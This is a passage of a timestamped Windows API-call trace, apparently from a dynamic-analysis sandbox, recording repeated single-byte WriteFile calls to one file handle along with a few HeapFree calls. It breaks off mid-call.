[0116.541] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f40 | out: hHeap=0x29a0000) returned 1 [0116.541] WriteFile (in: hFile=0x358, lpBuffer=0x19f693*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f693*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.621] WriteFile (in: hFile=0x358, lpBuffer=0x19f693*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f693*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.621] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.621] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.621] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.621] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.621] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.621] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.621] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.621] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.622] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.622] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.622] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.622] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.622] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.622] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.622] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.622] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.622] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.622] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.623] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.623] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.623] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.623] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.623] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.623] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.623] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.624] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.624] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.624] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.624] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.624] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.624] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.624] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.624] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.624] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.624] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.625] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.625] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.625] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.625] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.625] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.625] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.625] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.625] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.625] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.625] WriteFile (in: hFile=0x358, lpBuffer=0x29a34b0*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x29a34b0*, lpNumberOfBytesWritten=0x19f640*=0x19, lpOverlapped=0x0) returned 1 [0116.625] WriteFile (in: hFile=0x358, lpBuffer=0x29aab70*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x29aab70*, lpNumberOfBytesWritten=0x19f670*=0x9, lpOverlapped=0x0) returned 1 [0116.626] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab70 | out: hHeap=0x29a0000) returned 1 [0116.626] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a3368 | out: hHeap=0x29a0000) returned 1 [0116.626] WriteFile (in: hFile=0x358, lpBuffer=0x19f693*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f693*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.626] WriteFile (in: hFile=0x358, lpBuffer=0x19f693*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f693*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.626] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.626] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.626] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.626] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.626] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.626] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.626] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.627] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.627] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.627] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.627] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.627] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.627] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.627] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.627] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.627] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.627] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.627] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.628] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.628] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.628] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.628] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.628] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.628] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.628] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.628] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.628] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.628] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.628] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.628] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.629] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.629] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.629] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.629] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.629] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.629] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.629] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.629] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.629] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.629] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.629] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.630] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.630] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.630] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.630] WriteFile (in: hFile=0x358, lpBuffer=0x29a7b40*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x29a7b40*, lpNumberOfBytesWritten=0x19f640*=0x17, lpOverlapped=0x0) returned 1 [0116.630] WriteFile (in: hFile=0x358, lpBuffer=0x29aab40*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x29aab40*, lpNumberOfBytesWritten=0x19f670*=0x9, lpOverlapped=0x0) returned 1 [0116.630] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab40 | out: hHeap=0x29a0000) returned 1 [0116.630] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a79f8 | out: hHeap=0x29a0000) returned 1 [0116.630] WriteFile (in: hFile=0x358, lpBuffer=0x19f693*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f693*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.630] WriteFile (in: hFile=0x358, lpBuffer=0x19f693*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f693*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.630] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.630] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, 